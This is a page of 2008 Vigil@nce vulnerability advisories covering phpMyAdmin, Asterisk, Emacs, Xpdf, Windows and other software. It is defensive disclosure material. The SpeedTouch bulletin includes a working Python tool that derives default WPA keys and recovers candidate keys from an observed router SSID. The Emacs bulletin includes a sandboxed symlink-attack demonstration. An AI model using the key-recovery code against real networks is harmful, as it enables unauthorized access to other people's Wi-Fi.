The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.
History of vulnerabilities analyzed by Vigil@nce:

vulnerability alert CVE-2008-1924

phpMyAdmin: file disclosure

Synthesis of the vulnerability

An attacker can send an HTTP POST request in order to read files on the computer where phpMyAdmin is installed.
Impacted products: Debian, openSUSE, phpMyAdmin, SLES.
Severity: 2/4.
Consequences: data reading.
Provenance: intranet client.
Creation date: 23/04/2008.
Identifiers: BID-28906, CERTA-2002-AVI-203, CVE-2008-1924, DSA-1557-1, MDVSA-2008:131, PMASA-2008-3, SUSE-SR:2008:026, SUSE-SR:2009:003, VIGILANCE-VUL-7781.

Description of the vulnerability

The phpMyAdmin program is used to administer a MySQL database.

The setLocalSelectedFile() method of the File class (phpMyAdmin/libraries/File.class.php) concatenates the name of the upload directory and the requested file name (simplified):
  function setLocalSelectedFile($name) {
    $result_name = $GLOBALS['cfg']['UploadDir'] . PMA_securePath($name);
    ...
However, when the request is sent as HTTP POST, the $GLOBALS['cfg']['UploadDir'] value can be empty. The resulting file name is then nothing more than the requested name, so the caller effectively chooses an arbitrary path.

An attacker can thus read files with the rights of the web server. The attacker must be able to create a table to exploit this vulnerability.
Full Vigil@nce bulletin... (Free trial)

vulnerability 7780

Speedtouch: predictable WPA keys

Synthesis of the vulnerability

An attacker can use the SSID to predict the default WPA key.
Impacted products: SpeedTouch.
Severity: 1/4.
Consequences: data reading.
Provenance: radio connection.
Creation date: 23/04/2008.
Identifiers: BID-28893, VIGILANCE-VUL-7780.

Description of the vulnerability

Thomson SpeedTouch routers ship with a default WPA key derived from the device serial number.

The algorithm used to generate this key was published. If the serial number is "CP0615JT109 (53)":
 - the two-letter code after the week and the trailing "(53)" are dropped, leaving CP0615109
 - the last 3 characters are replaced by the hexadecimal value of their ASCII codes: CP0615313039
 - a SHA-1 hash of CP0615313039 is computed: 742da831d2b657fa53d347301ec610e1ebf8a3d0
 - the last 6 hexadecimal digits of the hash form the SSID: SpeedTouchF8A3D0
 - the first 10 hexadecimal digits of the hash form the WPA key: 742DA831D2

Over the full range of possible serial numbers, an attacker can precompute the SSID and WPA key of every device and thus map an observed SSID to a handful of candidate keys. For example, the SSID SpeedTouchF8A3D0 corresponds to only two keys.

An attacker can thus guess the WPA key and access the victim's network.
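The derivation above and the SSID-to-key search it enables, as an added Python example that is not Thomson's code nor the published tool. It assumes the three-character production number ranges over 0-9 and A-Z and that ASCII codes are written as uppercase hex digits; the bulletin's example contains only digits, so those assumptions do not affect it. The search is restricted to one production year and week so that it runs in well under a second.

```python
import hashlib
import itertools
import string
from typing import List, Tuple

# Assumption: the 3-character production number ranges over 0-9 and A-Z.
PRODUCTION_ALPHABET = string.digits + string.ascii_uppercase


def derive_ssid_and_key(serial_core: str) -> Tuple[str, str]:
    """serial_core is 'CP' + YY + WW + a 3-character production number,
    e.g. 'CP0615109'. Returns (SSID, default WPA key)."""
    prefix, production = serial_core[:6], serial_core[6:]
    # ASCII codes of the last 3 characters in hex: '109' -> '313039'.
    # Uppercase hex is an assumption for letters (digits give the same either way).
    material = prefix + production.encode("ascii").hex().upper()
    digest = hashlib.sha1(material.encode("ascii")).hexdigest().upper()
    return "SpeedTouch" + digest[-6:], digest[:10]


def derive_from_label(serial_label: str) -> Tuple[str, str]:
    """Accepts the printed form 'CP0615JT109 (53)': drop the two-letter code
    after the week field and the trailing ' (53)' before deriving."""
    core = serial_label.split()[0]   # 'CP0615JT109'
    core = core[:6] + core[8:]       # 'CP0615109'
    return derive_ssid_and_key(core)


def recover_keys(ssid_suffix: str, years, weeks) -> List[Tuple[str, str]]:
    """Attacker side: walk the serial space for the given production years and
    weeks and return every (serial_core, wpa_key) whose SSID matches.
    The full range is 36**3 hashes per (year, week) pair."""
    suffix = ssid_suffix.upper()
    matches = []
    for yy, ww in itertools.product(years, weeks):
        prefix = f"CP{yy:02d}{ww:02d}"
        for chars in itertools.product(PRODUCTION_ALPHABET, repeat=3):
            core = prefix + "".join(chars)
            ssid, key = derive_ssid_and_key(core)
            if ssid.endswith(suffix):
                matches.append((core, key))
    return matches


if __name__ == "__main__":
    print(derive_from_label("CP0615JT109 (53)"))
    # Observed SSID suffix from a beacon; constructed search window.
    print(recover_keys("F8A3D0", years=[6], weeks=[15]))
```

Widening years and weeks to the whole production range is what turns the 24-bit SSID suffix into the short candidate list the bulletin describes; the bottleneck is simply the number of SHA-1 evaluations, which an attacker precomputes once.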

computer vulnerability note CVE-2008-1897 CVE-2008-1923

Asterisk: denial of service of IAX2

Synthesis of the vulnerability

An attacker can spoof IAX2 messages in order to force Asterisk to send audio data to a victim.
Impacted products: Asterisk Open Source, Debian, Fedora.
Severity: 2/4.
Consequences: denial of service on client.
Provenance: internet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 23/04/2008.
Identifiers: AST-2008-006, BID-28901, CVE-2008-1897, CVE-2008-1923, DSA-1563-1, FEDORA-2008-3365, FEDORA-2008-3390, VIGILANCE-VUL-7779.

Description of the vulnerability

An IAX2 session is established via a handshake using NEW and ACK messages. If the guest user is enabled, IAX2 sessions are not authenticated.

No random value ties an ACK message to the NEW message it answers. An attacker can therefore spoof a NEW message and then an ACK message in order to force the creation of a new session.

An attacker can thus spoof the address of the victim in order to force Asterisk to send audio data to the victim. This attack leads to a denial of service on the victim's network.
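The weakness above reduces to a handshake whose second message is not bound to the first. The following added example (a Python model, not Asterisk's code and not the IAX2 wire format) shows why the spoofed NEW/ACK pair succeeds, and the generic fix: the server's reply carries an unpredictable token that only the true holder of the source address receives, and the ACK must echo it. The addresses and the token scheme are constructed for the demonstration.

```python
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Set


@dataclass
class HandshakeServer:
    """Toy model of an unauthenticated NEW/ACK handshake (guest calls).
    bind_ack_to_new=False mirrors the vulnerable behaviour; True is the fix."""
    bind_ack_to_new: bool
    pending: Dict[str, str] = field(default_factory=dict)
    streaming_to: Set[str] = field(default_factory=set)

    def on_new(self, src_addr: str) -> str:
        """Answer a NEW. The reply, and therefore the token, is sent to the
        claimed source address, not to whoever actually emitted the packet."""
        token = secrets.token_hex(8)
        self.pending[src_addr] = token
        return token

    def on_ack(self, src_addr: str, token: Optional[str]) -> bool:
        """Complete the handshake. Without binding, any ACK from the claimed
        address opens a session and audio starts flowing to that address."""
        if self.bind_ack_to_new:
            expected = self.pending.get(src_addr)
            if expected is None or token is None:
                return False
            if not secrets.compare_digest(expected, token):
                return False
        self.pending.pop(src_addr, None)
        self.streaming_to.add(src_addr)
        return True


def spoofing_attack(server: HandshakeServer, victim_addr: str) -> bool:
    """Attacker forges both packets with the victim's source address.
    The server's reply to NEW goes to the victim, so the attacker never
    learns the token and can only send an ACK without it."""
    server.on_new(victim_addr)
    return server.on_ack(victim_addr, token=None)


if __name__ == "__main__":
    victim = "203.0.113.7"   # constructed address
    print(spoofing_attack(HandshakeServer(bind_ack_to_new=False), victim))  # session created
    print(spoofing_attack(HandshakeServer(bind_ack_to_new=True), victim))   # rejected
```

A legitimate caller still completes the bound handshake, because it receives the token in the reply and echoes it; only a party that cannot read traffic addressed to the claimed source is locked out, which is exactly the spoofing attacker.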

computer vulnerability bulletin CVE-2008-1694

Emacs: altering a file via vcdiff

Synthesis of the vulnerability

A local attacker can alter a file when the vcdiff script shipped with Emacs is used.
Impacted products: Mandriva Linux, Unix (platform) ~ not comprehensive.
Severity: 1/4.
Consequences: data creation/edition.
Provenance: user shell.
Creation date: 22/04/2008.
Identifiers: 208483, BID-28857, CVE-2008-1694, MDVSA-2008:096, VIGILANCE-VUL-7778.

Description of the vulnerability

The Emacs editor can connect to SCCS (Source Code Control System), an obsolete revision control system. The vcdiff script is then called to compare files.

However, vcdiff creates its temporary file insecurely, under the predictable name /tmp/geta$$ ($$ being the process ID). A local attacker can therefore predict the file name and plant a symbolic link at that location beforehand.

This vulnerability thus permits a local attacker to alter a file with the rights of the user running Emacs.
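An added Python example, not part of Emacs or vcdiff, that reproduces the symlink attack in a throwaway directory standing in for /tmp and contrasts it with a creation flag that refuses a pre-planted name. The PID (4242), file names and contents are constructed; on a real system the attacker would guess or watch for the PID of the running script.

```python
import os
import shutil
import tempfile
from typing import Tuple


def predictable_temp_name(tmp_dir: str, pid: int) -> str:
    """Mirrors /tmp/geta$$: the name depends only on a guessable PID."""
    return os.path.join(tmp_dir, f"geta{pid}")


def unsafe_write(path: str, data: str) -> None:
    """open(..., 'w') uses O_CREAT without O_EXCL, so it follows a symlink
    that already sits at the path and writes through it."""
    with open(path, "w") as f:
        f.write(data)


def safe_write(path: str, data: str) -> None:
    """O_EXCL makes creation fail if anything (including a symlink) exists at
    the path; O_NOFOLLOW is added where the platform offers it."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def demo() -> Tuple[str, bool, str]:
    """Returns (victim content after unsafe write, whether safe write refused,
    victim content after the safe attempt)."""
    sandbox = tempfile.mkdtemp()          # stands in for /tmp
    try:
        victim = os.path.join(sandbox, "victim.txt")
        with open(victim, "w") as f:
            f.write("original\n")

        # Attacker: plant a link at the name the script is about to use.
        link = predictable_temp_name(sandbox, pid=4242)
        os.symlink(victim, link)

        # Victim's script, vulnerable version: the write lands in victim.txt.
        unsafe_write(link, "clobbered\n")
        with open(victim) as f:
            after_unsafe = f.read()

        # Same situation, exclusive creation: the planted link is rejected.
        try:
            safe_write(link, "clobbered again\n")
            safe_refused = False
        except FileExistsError:
            safe_refused = True
        with open(victim) as f:
            after_safe = f.read()

        # The proper fix is to let the OS choose an unpredictable name atomically.
        fd, _ = tempfile.mkstemp(dir=sandbox)
        os.close(fd)
        return after_unsafe, safe_refused, after_safe
    finally:
        shutil.rmtree(sandbox)


if __name__ == "__main__":
    print(demo())
```

In a shell script the equivalent of the last step is mktemp; a fixed name plus a later existence check does not help, because the attacker wins the race between the check and the open.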

computer vulnerability announce CVE-2008-1693

Xpdf: code execution via fonts

Synthesis of the vulnerability

An attacker can create a PDF document containing malicious character fonts in order to execute code on the computer of a victim who opens this document with Xpdf or one of its derivatives.
Impacted products: Debian, Fedora, Mandriva Linux, openSUSE, RHEL, SLES.
Severity: 3/4.
Consequences: user access/rights.
Provenance: document.
Creation date: 18/04/2008.
Identifiers: BID-28830, CERTA-2002-AVI-200, CERTA-2008-AVI-220, CVE-2008-1693, DSA-1548-1, DSA-1606-1, FEDORA-2008-3312, MDVSA-2008:089, MDVSA-2008:173, MDVSA-2008:197, MDVSA-2008:197-1, RHSA-2008:0238-01, RHSA-2008:0239-01, RHSA-2008:0240-01, RHSA-2008:0262-01, SUSE-SR:2008:011, SUSE-SR:2008:013, VIGILANCE-VUL-7777.

Description of the vulnerability

A PDF document can use standard fonts (Courier, Helvetica, Times-Roman, Symbol) or incorporate its own embedded font definitions.

However, if an embedded font is malformed, a memory corruption occurs in Xpdf when the document is opened.

An attacker can therefore create a PDF document containing malicious fonts in order to execute code on the computer of a victim who opens it with Xpdf or one of its derivatives.

computer vulnerability alert CVE-2008-1436 CVE-2009-0078 CVE-2009-0079

Windows: privilege elevation

Synthesis of the vulnerability

An authenticated attacker, running in the NetworkService or LocalService context, can elevate his privileges to LocalSystem.
Impacted products: IIS, SQL Server, Windows 2000, Windows 2003, Windows 2008 R0, Windows Vista, Windows XP.
Severity: 2/4.
Consequences: administrator access/rights.
Provenance: user account.
Number of vulnerabilities in this bulletin: 4.
Creation date: 18/04/2008.
Revisions dates: 21/04/2008, 29/08/2008, 09/10/2008, 14/10/2008, 15/04/2009.
Identifiers: 951306, 959454, BID-28833, BID-34442, BID-34443, BID-34444, CERTA-2009-AVI-142, CVE-2008-1436, CVE-2009-0078, CVE-2009-0079, CVE-2009-0080, MS09-012, VIGILANCE-VUL-7776.

Description of the vulnerability

A user can execute code in the NetworkService or LocalService context:
 - via IIS: code as an ISAPI filter/extension
 - via IIS: ASP.NET code running as "full trust"
 - via SQL Server: the privilege to load and run code
 - via MSDTC (Microsoft Distributed Transaction Coordinator, on Windows 2003)

However, these features do not correctly isolate their processes. Code running in the NetworkService/LocalService context can thus elevate its privileges to LocalSystem. Four vulnerabilities can be exploited.

The MSDTC (Microsoft Distributed Transaction Coordinator) allows the NetworkService token to be used for a RPC call. [severity:2/4; CERTA-2009-AVI-142, CVE-2008-1436]

An attacker can use WMI (Windows Management Instrumentation) to access a process with SYSTEM privileges and execute code. [severity:2/4; BID-34442, CVE-2009-0078]

An attacker can use the RPCSS service to obtain LocalSystem privileges. [severity:2/4; BID-34443, CVE-2009-0079]

Incorrect ACLs (Access Control Lists) are set on the current ThreadPool, which can be used by a local attacker to acquire LocalSystem privileges. [severity:2/4; BID-34444, CVE-2009-0080]

An authenticated attacker can thus obtain administrative privileges on the system.

computer vulnerability 7775

Business Objects: Cross Site Scripting

Synthesis of the vulnerability

An attacker can trigger a Cross Site Scripting via the cms parameter of Business Objects InfoView XI R2.
Impacted products: Business Objects.
Severity: 2/4.
Consequences: client access/rights.
Provenance: document.
Creation date: 17/04/2008.
Identifiers: VIGILANCE-VUL-7775.

Description of the vulnerability

The Java version of Business Objects InfoView XI R2 has a vulnerable authentication form.

Indeed, the cms parameter is not filtered before being displayed.

An attacker can therefore trigger a Cross Site Scripting, for example in order to execute JavaScript code in the context of the victim.

vulnerability note CVE-2007-4770 CVE-2007-4771 CVE-2007-5745

OpenOffice.org: several vulnerabilities

Synthesis of the vulnerability

Several vulnerabilities of OpenOffice.org can be used by an attacker to execute code on the computer of a victim who opens a malicious document.
Impacted products: OpenOffice, Debian, Fedora, Mandriva Linux, Windows (platform) ~ not comprehensive, openSUSE, Solaris, Trusted Solaris, RHEL, Unix (platform) ~ not comprehensive.
Severity: 3/4.
Consequences: user access/rights, denial of service on client.
Provenance: internet client.
Number of vulnerabilities in this bulletin: 4.
Creation date: 17/04/2008.
Identifiers: 231601, 231641, 231642, 231661, 6633029, 6633041, 6657640, 6660931, BID-28819, CERTA-2008-AVI-123, CERTA-2008-AVI-218, CVE-2007-4770, CVE-2007-4771, CVE-2007-5745, CVE-2007-5746, CVE-2007-5747, CVE-2008-0320, DSA-1547-1, FEDORA-2008-3251, FEDORA-2008-4104, MDVSA-2008:090, MDVSA-2008:095, RHSA-2008:0175-01, RHSA-2008:0176-01, SUSE-SA:2008:023, VIGILANCE-VUL-7774.

Description of the vulnerability

Several vulnerabilities of OpenOffice.org can be used by an attacker to execute code on the computer of a victim who opens a malicious document.

A heap overflow can occur when opening an ODF document containing XForms. [severity:3/4; CERTA-2008-AVI-123, CERTA-2008-AVI-218, CVE-2007-4770, CVE-2007-4771]

A heap overflow can occur when opening a Quattro Pro document. [severity:3/4; CVE-2007-5745, CVE-2007-5747]

A heap overflow can occur when opening an EMF image. [severity:3/4; CVE-2007-5746]

A heap overflow can occur when opening a document containing OLE objects. [severity:3/4; CVE-2008-0320]

vulnerability bulletin CVE-2008-1878 CVE-2008-1964

xine-lib: buffer overflow of NSF

Synthesis of the vulnerability

An attacker can create a malicious NSF file in order to trigger an overflow during NSF parsing.
Impacted products: Debian, Fedora, openSUSE, Unix (platform) ~ not comprehensive.
Severity: 2/4.
Consequences: user access/rights, denial of service on client.
Provenance: document.
Number of vulnerabilities in this bulletin: 2.
Creation date: 17/04/2008.
Revision date: 24/04/2008.
Identifiers: BID-28816, BID-28908, CVE-2008-1878, CVE-2008-1964, DSA-1586-1, FEDORA-2008-3326, FEDORA-2008-3353, SUSE-SR:2008:012, VIGILANCE-VUL-7773.

Description of the vulnerability

The src/demuxers/demux_nsf.c file of xine-lib demuxes NSF (NES Sound Format) data. It has two vulnerabilities.

The demux_nsf_send_chunk() function stores the title in a 100-byte array without checking its size. [severity:2/4; BID-28816, CVE-2008-1878]

The demux_nsf_send_headers() function stores the copyright string in a 100-byte array without checking its size. [severity:1/4; BID-28908, CVE-2008-1964]

An attacker can create an NSF file containing an overlong title, then invite the victim to open it with an application linked to xine-lib. The resulting overflow leads to a denial of service or to code execution.

vulnerability announce CVE-2008-1096 CVE-2008-1097

ImageMagick: memory corruptions via PCX or XCF

Synthesis of the vulnerability

An attacker can create a malicious PCX or XCF image leading to a denial of service or to code execution on the computers of ImageMagick users.
Impacted products: Debian, Mandriva Linux, openSUSE, RHEL, Unix (platform) ~ not comprehensive.
Severity: 2/4.
Consequences: user access/rights, denial of service on client.
Provenance: document.
Number of vulnerabilities in this bulletin: 2.
Creation date: 17/04/2008.
Identifiers: 285861, 286411, 413034, 414370, BID-28821, BID-28822, CVE-2008-1096, CVE-2008-1097, DSA-1858-1, DSA-1903-1, MDVSA-2008:099, RHSA-2008:0145-01, RHSA-2008:0165-01, SUSE-SR:2008:014, VIGILANCE-VUL-7772.

Description of the vulnerability

ImageMagick has two memory corruption vulnerabilities.

A malicious XCF image corrupts the memory of the load_tile() function of coders/xcf.c. [severity:2/4; 286411, 414370, BID-28821, CVE-2008-1096]

A malicious PCX image corrupts the memory of the ReadPCXImage() function of coders/pcx.c. [severity:2/4; 285861, 413034, BID-28822, CVE-2008-1097]

An attacker can therefore invite a user to open a malicious PCX or XCF image with ImageMagick in order to generate a denial of service or to run code on his computer.